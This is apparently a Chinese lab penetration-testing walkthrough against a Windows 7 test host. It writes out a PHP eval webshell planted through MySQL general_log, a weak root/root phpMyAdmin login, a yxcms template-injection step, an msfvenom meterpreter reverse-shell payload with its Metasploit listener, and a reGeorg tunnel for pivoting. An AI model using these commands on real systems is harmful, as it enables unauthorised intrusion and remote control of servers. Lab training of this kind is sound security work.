环境介绍
攻击机为kali和win7的外网ip为同一网段
环境搭建过程就不在过多解释,可以看图理解
信息收集
我们拿到ip之后先nmap收集一波,可以查看出开放的端口和服务
开放的80和3306端口 看到开放了3306就想到了phpmyadmin服务,尝试下发现真的存在
测试root root弱口令成功登陆
可尝试使用file_into或日志写入webshell。
代码语言:javascript复制into写入文件:
使用需看要secure_file_priv的值。
当value为“null”时,不允许读取任意文件
当value为“空”时,允许读取任意文件
value可也已设置为其他路径。
可通过日志进行getshell
漏洞利用
上述分析后 发现直接无法写入,所以利用全局变量general_log去getshell
代码语言:javascript复制set global general_log=on; 开启日志
代码语言:javascript复制set global general_log_file='C:/phpstudy/www/ly0n.php'; 设置日志位置为根目录下
写入一句话马进行getshell
代码语言:javascript复制select '<?php @eval($_POST["ly0n"]); ?>'
然后取直接访问这个文件
使用蚁剑连接
getshell 后发现在根目录下存在yxcms 访问目录
根据前台提供信息能够进入后台管理页面
百度得到该版本yxcms存在后台模版漏洞
我们在后台修改前台模版的代码,插入一句话
然后蚁剑连接
初探内网
蚁剑连接后开始进行下一步的操作 发现是admin权限的用户
通过前面的扫描端口可知开放了 3306,80端口
3306我们已经看到phpmyadmin,所以我们可以反弹shell
使用kali的msfvenom 生成exe文件
代码语言:javascript复制msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.129 LPORT=9999 -f exe -o /home/ly0n/ly0n.exe
通过蚁剑上传到目标机器
利用蚁剑运行 在kali 设置监听得到会话
代码语言:javascript复制use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.110.129
set lport 9999
exploit
目标机器为win7 可以输入shell进入终端 通过ipconfig可以看到存在另外一个网段
横向渗透
这里采用reGeorg来实现内网转发
将该工具里面的tunnel.nosocket.php上传到网站目录下(不要根目录)
访问出现如下
然后配置我们的服务
代码语言:javascript复制sudo python reGeorgSocksProxy.py -u http://192.168.110.143/yxcms/tunnel.nosocket.php -p 9999
然后再去访问192.168.102.138
后续漏洞利用暂时未做